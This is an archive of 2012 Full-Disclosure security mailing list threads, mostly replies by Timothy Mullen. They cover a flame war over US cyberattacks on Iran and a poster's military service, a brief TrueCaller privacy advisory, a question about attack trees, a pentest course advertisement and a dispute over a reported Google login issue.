Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
OK, I'll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can't consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your right to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don't need your service dates, but it will help. All I need do is fax over form SF-180, and they'll verify your service. If you really did serve, I'll apologize publically. If you didn't (or don't provide the information) then we'll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough? [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai Sent: Sunday, June 10, 2012 2:00 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/10/12 12:52 PM, Thor (Hammer of God) wrote: And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing. On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.orgmailto:laure...@oneechan.org wrote: I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Except i don't like the government. inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Awesome. I'll send 'er off. Andrew Wallace, correct? [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Laurelai [mailto:laure...@oneechan.org] Sent: Sunday, June 10, 2012 2:26 PM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/10/12 5:09 PM, Thor (Hammer of God) wrote: OK, I'll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can't consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your right to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don't need your service dates, but it will help. All I need do is fax over form SF-180, and they'll verify your service. If you really did serve, I'll apologize publically. If you didn't (or don't provide the information) then we'll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough? [Description: Description: Description:Description: Description: Description: Description:Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai Sent: Sunday, June 10, 2012 2:00 PM To: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/10/12 12:52 PM, Thor (Hammer of God) wrote: And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing. On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.orgmailto:laure...@oneechan.org wrote: I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Except i don't like the government. I went to basic in september of 99 and ETS'ed in may of 08. 6 years were national guard 4 years active duty, i went to basic at FT. Jackson South Carolina, the base has a lot of fire ants and the weather was a bit unpredictable. My drill sergeant's names were Drill Sergeant Hunter and Drill Sergeant Wachowski The unit i ETS'ed from was HHB 4/5 ADA out of camp carrol South Korea, and right before i left korea our CSM was relieved of duty (CSM Larkin) for sexually harassing junior enlisted soldiers under his command. I worked in the S-6 shop in a 25B slot for a long time even though i had been trained as a 14E ( patriot systems operator and maintainer), I went to echo school at FT. Bliss and let me tell you when I got there I thought the place was just terrible, but there is nothing like the view of watching the sun set against those desert mountains, absolutely beautiful. While I was i South Korea I met up with hubris from backtrace security believe it or not since he was in the area at the time, ( this was before there ever was a backtrace security) he showed me all the fun places to hang out away from the tourist traps and he has seen me in uniform. So stick that in your pipe and smoke it. inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Well no freaking wonder then. For whatever reason, I keep thinking you are Andrew posting under a different name, which always confused me. I know Andrew didn't serve in the Army, which just made me think he was losing his mind. (I've actually never had a problem with Andrew, though I guess many here have.) So yes, my apologies, as I obviously don't know you from Adam. Now everything makes more sense. T Sent from my iPad On Jun 10, 2012, at 4:21 PM, Laurelai laure...@oneechan.orgmailto:laure...@oneechan.org wrote: On 6/10/12 6:00 PM, Thor (Hammer of God) wrote: Awesome. I’ll send ‘er off. “Andrew Wallace,” correct? mime-attachment.png Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Laurelai [mailto:laure...@oneechan.org] Sent: Sunday, June 10, 2012 2:26 PM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/10/12 5:09 PM, Thor (Hammer of God) wrote: OK, I’ll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can’t consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your “right” to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don’t need your service dates, but it will help. All I need do is fax over form SF-180, and they’ll verify your service. If you really did serve, I’ll apologize publically. If you didn’t (or don’t provide the information) then we’ll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough? mime-attachment.png Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai Sent: Sunday, June 10, 2012 2:00 PM To: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/10/12 12:52 PM, Thor (Hammer of God) wrote: And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing. On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.orgmailto:laure...@oneechan.org wrote: I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Except i don't like the government. I went to basic in september of 99 and ETS'ed in may of 08. 6 years were national guard 4 years active duty, i went to basic at FT. Jackson South Carolina, the base has a lot of fire ants and the weather was a bit unpredictable. My drill sergeant's names were Drill Sergeant Hunter and Drill Sergeant Wachowski The unit i ETS'ed from was HHB 4/5 ADA out of camp carrol South Korea, and right before i left korea our CSM was relieved of duty (CSM Larkin) for sexually harassing junior enlisted soldiers under his command. I worked in the S-6 shop in a 25B slot for a long time even though i had been trained as a 14E ( patriot systems operator and maintainer), I went to echo school at FT. Bliss and let me tell you when I got there I thought the place was just terrible, but there is nothing like the view of watching the sun set against those desert mountains, absolutely beautiful. While I was i South Korea I met up with hubris from backtrace security believe it or not since he was in the area at the time, ( this was before there ever was a backtrace security) he showed me all the fun places to hang out away from the tourist traps and he has seen me in uniform. So stick that in your pipe and smoke it. Where the hell did you get that name from lol inline: ATT1.png___ Full
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Aw, what's wrong Georgie? Jealous that you can't get out of your has been status? Not that your self-proclaimed street cred was that much to begin with. :) shouldn't you be working on finding more articles to post so you can write M$ and windoze like the other posers and substantiate your ego given your little man syndrome? LOL. Oh, that may not be fair. I'm sure you've written books you can point us to. And code too, right? Let's revive those l337 skilz of yours!! Pmsl. Just kidding, of course. I have nothing but the highest respect for all the good things you've done for the security industry! t On Jun 9, 2012, at 12:46 AM, Georgi Guninski gunin...@guninski.com wrote: On Fri, Jun 08, 2012 at 05:03:02PM +, Thor (Hammer of God) wrote: Man does things for two reasons: to get laid, or to get paid. This completely explains why you are on this list. Are you a paid poster or just advertising your leaflet book? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
+1. I (sometimes regrettably) am from the south. It's quite embarrassing to hear people refer to Sikhs as Muslims in a derogatory fashion (as if there was something wrong with it in the first place) just because they look that way. t Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible Leaflet -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Saturday, June 09, 2012 12:28 PM To: Christian Sciberras Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks On Sat, 09 Jun 2012 14:25:00 +0200, Christian Sciberras said: Yes, let's just forget Iran would strike any country against its religious views, especially Israel. I'm personally more worried that US Islamophobia will lead to a first strike than I am that Iran will make a first strike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
finding solutions to countries using cyberwar and using innocent peoples machines to carry it out, invading peoples privacy and generally doing terrible stuff in the name of god and country. What solution? And who exactly is going to find it? The entire history of mankind is based on the terrible stuff we do in the name of god and country. We, of course, being humans. All we need is one of the two and we've got all the justification we need to go off and kill someone else for having a different god or different country. Note I said justification and not motivation. God and country are just excuses - means to an end. There's always another agenda. Man does things for two reasons: to get laid, or to get paid. Everything else is just a nice fuzzy wrap to make us feel better about ourselves. Finding some other solution is naïve and a waste of time. We, and everyone else, will do whatever we want to do, and do whatever it takes to get away with it. It's as simple as that. It's easy and convenient for you to bitch about the injustices from behind a keyboard when men and woman are out there DYING for their country and the integrity of what they believe in, irrespective of the basis of the decisions their commanding bodies have for sending them out there. It's called real life. Grow up and go get that bleeding heart sewn up at some free clinic, paid for by the government that has to do the hard work in order to preserve your right to whine about it. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai Sent: Friday, June 08, 2012 9:04 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran On 6/8/12 11:38 AM, valdis.kletni...@vt.edumailto:valdis.kletni...@vt.edu wrote: On Thu, 07 Jun 2012 13:48:33 -0400, Ian Hayes said: On Thu, Jun 7, 2012 at 1:40 PM, andrew.wallace andrew.wall...@rocketmail.commailto:andrew.wall...@rocketmail.com wrote: On Tue, Jun 5, 2012 at 8:43 PM, valdis.kletni...@vt.edumailto:valdis.kletni...@vt.edu wrote: One could equally well read that as We're fed up and about to pound North Korea even further back into the Stone Age. With Stuxnet, it was lucky nobody was seriously injured. You cannot condone such weapons Valdis, or your hat will start to turn grey, black. Stuxnet may not have killed anyone, but several Iranian nuclear scientists were assassinated in conjunction with Stuxnet's release. Please don't feed the troll - the only way he can post to full-disclosure is if somebody quotes him in. The worst part is that Andrew's reading comprehension is as good as always - I wasn't commenting on Stuxnet, but the move of naval forces to the Pacific. China isn't the only reason we might want a naval task force over there. And I never said I condoned it, merely pointed out alternate interpretations. The funny thing is that Andrew was going on for a *long* time that there is no such thing as cyber-warfare - when in fact it was going on while he was denying it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I think the real question we should all think on is what are we going to do about this kind of thing? Because the way I see it, the infosec industry is part of this problem until it finds a way to be a part of the solution, if you all even desire this. If you do then lets talk about finding solutions to countries using cyberwar and using innocent peoples machines to carry it out, invading peoples privacy and generally doing terrible stuff in the name of god and country. If you don't then just do us all a favor and stop calling yourself an infosec expert, stop pretending to be one of the good guys and just call yourself a mercenary and realize you are in the same class of people who assassinated civilian scientists for political reasons. I hope all that money helps you sleep at night. inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details
You can still submit fake data by just adding fake contacts. And of course, the real privacy issue here is that you are sharing your freaking address book with the world. Frankly, I’m amazed anyone would even think about doing that. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Kuwait WhiteHat Sent: Friday, June 01, 2012 6:30 AM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details TrueCaller – worldwide number search and spam filter, a top iPhone application in many countries, enables users to search half a billion phone numbers worldwide and much more. The application allows users to search numbers if and only if the user enables Enhanced Search feature. When enabled, the user is warned that his contacts will be shared with other users to search and his address book is sent to TrueCaller database. This process is done by sending the following HTTP “cleartext” request: post_contact_data=[{REV:,FN:ContactName,TEL_CELL:[MobileNumber],”TCBID”:”Number“,”FID”:”Number“,”TEL_WORK”:[Number],”TEL_HOME”:[],”CONTACT_ID”:”3619″,”LID”:”} From a security point of view, this is a bad security behavior and may lead to one of the following situations: · Privacy Issues · Fake Data · Enabling Enhanced Search features without having to share user’s Address Book Advisory Timeline 28/Apr/2012 – First contact: Vulnerability details sent 29/Apr/2012 – Response received: Asked for more details 29/Apr/2012 – Second Contact: More details provided and cleared TrueCaller doubts 30/Apr/2012 – Vulnerability Confirmed: TrueCaller started working on a fix 01/May/2012 – Vulnerability Fixed: Fix submitted to Apple for approval 17/May/2012 – New Version Released: Fix approved by Apple and released 01/Jun/2012 - Vulnerability Released. Details and more information here: http://q8whitehat.org/truecaller-vulnerability-allows-changing-users-name/ inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Info about attack trees
Here's the best info on attack trees: http://3.bp.blogspot.com/-P_enGjuZU0I/TxFdFfD1A5I/BKs/DTzpNDG4THc/s1600/ent_isengard_small.jpg [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Urlan Sent: Friday, May 25, 2012 9:45 AM To: Federico De Meo Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Info about attack trees Federico, Check this out: http://cwe.mitre.org/top25/ 2012/5/25 Federico De Meo ade...@gmail.commailto:ade...@gmail.com Hello everybody, I'm new to this maling-list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some informations about attack trees usage in web application analysis. For my master thesis I decided to study the usage of this formalism in order to reppresent attacks to a web applications. I need a lot of use cases from which to start learning common attacks which can help building a proper tree. From where can I start? I've already read the OWASP top 10 vulnerabilities an I'm familiar with XSS, SQLi, ecc. however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe to some famous attacks from which I can understand which steps are performed and how commons vulnerabilities can being combined together. Any help is really appreciated. --- Federico. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cordialmente, Urlan Salgado de Barros CompTIA Security+ Certified MSc. in Applied Informatics Bachelor on Computer Science inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Certificacion - Profesional Pentester
Certainly. In fact, if anyone else wants to help perform the test on behalf of HoG, please let me know and I'll officially write up a change order to specify additional resources. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Giles Coochey Sent: Thursday, May 24, 2012 2:38 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Certificacion - Profesional Pentester On 23/05/2012 20:26, Thor (Hammer of God) wrote: Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I'm copying in FD again so they can all be witness to the fact you acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I'm looking forward to it! Thank you. Is your final report going to be public? -- inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Certificacion - Profesional Pentester
Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I’m copying in FD again so they can all be witness to the fact you acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I’m looking forward to it! Thank you. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Juan Sacco [mailto:jsa...@exploitpack.com] Sent: Wednesday, May 23, 2012 7:59 AM Subject: Certificacion - Profesional Pentester Certificate como un profesional de la seguridad informática y aprende a realizar tu mismo un penetration testing. El curso tiene una duración de ( 15 horas de practica en laboratorio ) y se entrega diploma y certificado de asistencia. ( Con examen final aprobado ) Primer clase empieza este sabado 26, es ONLINE y en VIVO. El contenido del curso es técnico y practico, ademas se incluye licencia de Exploit Pack ( de regalo ) herramienta la cual utilizaremos para realizar testeos de intrusión. Costo total con descuento: 150 USD Registrate ahora: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclickhosted_button_id=UXC4U5BSVP4P4 Como se realiza un Buffer Overflow y como prevenirlos? - Manejo de memoria - Procesamiento y threads - Escritura en memoria - Compilacion usando GCC - Debugging con GDB - Tecnicas de proteccion - Seguridad web SQL y XSS - Debugging de sitios - Programacion en Javacript - Politicas de segurida - Arquitectura de computadores - Lenguaje ensamblador - Buffer Overflows - Escritura y manejo de pilas - Exploits con Python No se requiere ningún conocimiento previo para asistir ya que se empieza desde cero. Saludos Juan Sacco Exploit Pack http://exploitpack.com inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Certificacion - Profesional Pentester
Other way around. I’ll be sending HIM a bill. Which, based on our contract, I will be able to pay on his behalf ☺ From: Peter Dawson [mailto:slash...@gmail.com] Sent: Wednesday, May 23, 2012 12:50 PM To: Thor (Hammer of God) Cc: Juan Sacco; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Certificacion - Profesional Pentester yes thats true ..but lets not 4get one needs to forkup $150/- before you can finger their servers 2012/5/23 Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I’m copying in FD again so they can all be witness to the fact you acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I’m looking forward to it! Thank you. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy “Thor” Mullen www.hammerofgod.comhttp://www.hammerofgod.com/ Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Juan Sacco [mailto:jsa...@exploitpack.commailto:jsa...@exploitpack.com] Sent: Wednesday, May 23, 2012 7:59 AM Subject: Certificacion - Profesional Pentester Certificate como un profesional de la seguridad informática y aprende a realizar tu mismo un penetration testing. El curso tiene una duración de ( 15 horas de practica en laboratorio ) y se entrega diploma y certificado de asistencia. ( Con examen final aprobado ) Primer clase empieza este sabado 26, es ONLINE y en VIVO. El contenido del curso es técnico y practico, ademas se incluye licencia de Exploit Pack ( de regalo ) herramienta la cual utilizaremos para realizar testeos de intrusión. Costo total con descuento: 150 USD Registrate ahora: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclickhosted_button_id=UXC4U5BSVP4P4 Como se realiza un Buffer Overflow y como prevenirlos? - Manejo de memoria - Procesamiento y threads - Escritura en memoria - Compilacion usando GCC - Debugging con GDB - Tecnicas de proteccion - Seguridad web SQL y XSS - Debugging de sitios - Programacion en Javacript - Politicas de segurida - Arquitectura de computadores - Lenguaje ensamblador - Buffer Overflows - Escritura y manejo de pilas - Exploits con Python No se requiere ningún conocimiento previo para asistir ya que se empieza desde cero. Saludos Juan Sacco Exploit Pack http://exploitpack.comhttp://exploitpack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
It’s you. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Ferenc Kovacs [mailto:tyr...@gmail.com] Sent: Sunday, May 20, 2012 2:23 AM To: Thor (Hammer of God) Cc: Dan Kaminsky; Michael Gray; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability is it me, or you aren't reading the mails that you are replying to? On Sat, May 19, 2012 at 7:28 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: I tried, and it didn’t work (couldn’t repro). None of this matters – if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was “by design.” If anyone is saying this is some sort of vulnerability because someone “happens across your username and password” then they are in the wrong business. Michael – for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time. Your initial point of “even the big companies with teams of security experts have security vulnerabilities” seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I not sure what other expectations one would have of an organization. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy “Thor” Mullen www.hammerofgod.comhttp://www.hammerofgod.com Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Dan Kaminsky Sent: Friday, May 18, 2012 1:03 PM To: Michael Gray Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability Surely you can create a sock puppet for debugging purposes. On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.commailto:mg...@emitcode.com wrote: I'm not interested in providing that information. You can reproduce it without knowing my user name. On May 17, 2012 8:45 AM, Mike Hearn he...@google.commailto:he...@google.com wrote: If you provide the name of the account you're logging in to, we can go take a look what's happening. On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.commailto:mg...@emitcode.com wrote: Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues On May 17, 2012 5:51 AM, Mike Hearn he...@google.commailto:he...@google.com wrote: I understand your concerns, however they are not valid. You can be assured of the following: 1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them, if it wasn't we ask them to pick a new password. In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense. 2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well. 3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password. A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts). That said, if you have friends and relatives who use Google and you'd like to to make them more secure, by all means encourage them to set up two-factor authentication. -- Mike Hearn | Senior Software Engineer | he...@google.commailto:he...@google.com | Account
Re: [Full-disclosure] Google Accounts Security Vulnerability
I tried, and it didn't work (couldn't repro). None of this matters - if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was by design. If anyone is saying this is some sort of vulnerability because someone happens across your username and password then they are in the wrong business. Michael - for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time. Your initial point of even the big companies with teams of security experts have security vulnerabilities seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I not sure what other expectations one would have of an organization. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Dan Kaminsky Sent: Friday, May 18, 2012 1:03 PM To: Michael Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability Surely you can create a sock puppet for debugging purposes. On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.commailto:mg...@emitcode.com wrote: I'm not interested in providing that information. You can reproduce it without knowing my user name. On May 17, 2012 8:45 AM, Mike Hearn he...@google.commailto:he...@google.com wrote: If you provide the name of the account you're logging in to, we can go take a look what's happening. On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.commailto:mg...@emitcode.com wrote: Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues On May 17, 2012 5:51 AM, Mike Hearn he...@google.commailto:he...@google.com wrote: I understand your concerns, however they are not valid. You can be assured of the following: 1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them, if it wasn't we ask them to pick a new password. In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense. 2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well. 3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password. A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts). That said, if you have friends and relatives who use Google and you'd like to to 